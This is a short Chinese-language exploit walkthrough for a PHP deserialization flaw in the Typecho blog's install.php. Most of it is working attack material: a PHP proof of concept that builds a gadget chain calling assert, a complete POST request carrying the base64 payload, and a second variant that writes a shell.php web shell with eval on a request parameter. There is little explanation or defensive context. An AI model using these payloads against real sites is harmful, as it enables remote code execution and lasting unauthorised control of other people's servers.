环境搭建

下载typecho14.10.10 

https://github.com/typecho/typecho/tags

安装，这里需要安装数据库

PHPINFO

 POC.php

<?php
class Typecho_Feed 
{ 
	const RSS1 = 'RSS 1.0'; 
	const RSS2 = 'RSS 2.0'; 
	const ATOM1 = 'ATOM 1.0'; 
	const DATE_RFC822 = 'r'; 
	const DATE_W3CDTF = 'c'; 
	const EOL = "\n"; 
	private $_type; 
	private $_items; 
	
	public function __construct(){
    $this->_type = $this::RSS2; 
    $this->_items[0] = array( 
    	'title' => '1', 
    	'link' => '1', 
    	'date' => 1508895132, 
    	'category' => array(new Typecho_Request()), 
    	'author' => new Typecho_Request(), 
    	); 
  	} 
} 
class Typecho_Request 
{ 
	private $_params = array(); 
	private $_filter = array(); 
	public function __construct(){ 
	$this->_params['screenName'] = 'phpinfo()';    //替换phpinfo()这里进行深度利用
	$this->_filter[0] = 'assert'; 
	} 
} 
 
$exp = array( 
	'adapter' => new Typecho_Feed(), 
	'prefix' => 'typecho_' 
); 
 
echo base64_encode(serialize($exp));
?>

 POST数据包如下，访问install.php并携带参数finish，Referer来自本网站，POST传递恶意参数

POST /build/install.php?finish=1 HTTP/1.1

Host: 10.9.75.161

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9

Connection: close

Referer: http://10.9.75.161/build/install.php?finish=1

Content-Length: 774

Content-Type: application/x-www-form-urlencoded



__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjk6InBocGluZm8oKSI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJhc3NlcnQiO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30

GETshell

<?php
class Typecho_Feed{
	const RSS1 = 'RSS 1.0';
	const RSS2 = 'RSS 2.0';
	const ATOM1 = 'ATOM 1.0';
   	const DATE_RFC822 = 'r';
	const DATE_W3CDTF = 'c';
	const EOL = "\n";
	private $_type;
	private $_items;
	
	public function __construct(){
		$this->_type = $this::RSS2;
		$this->_items[0] = array(
			'title' => '1',
			'link' => '1',
			'date' => 1508895132,
			'category' => array(new Typecho_Request()),
			'author' => new Typecho_Request(),
		);
	}
}

class Typecho_Request{
	private $_params = array();
	private $_filter = array();

	public function __construct(){
		$this->_params['screenName'] = "fputs(fopen('shell.php', w), '<?php phpinfo();@eval(\$_REQUEST[777])?>')";
		$this->_filter[0] = 'assert';
    }
}

$exp = array(
	'adapter' => new Typecho_Feed(),
	'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>

步骤和前面一样，把payload放__typecho_config=就行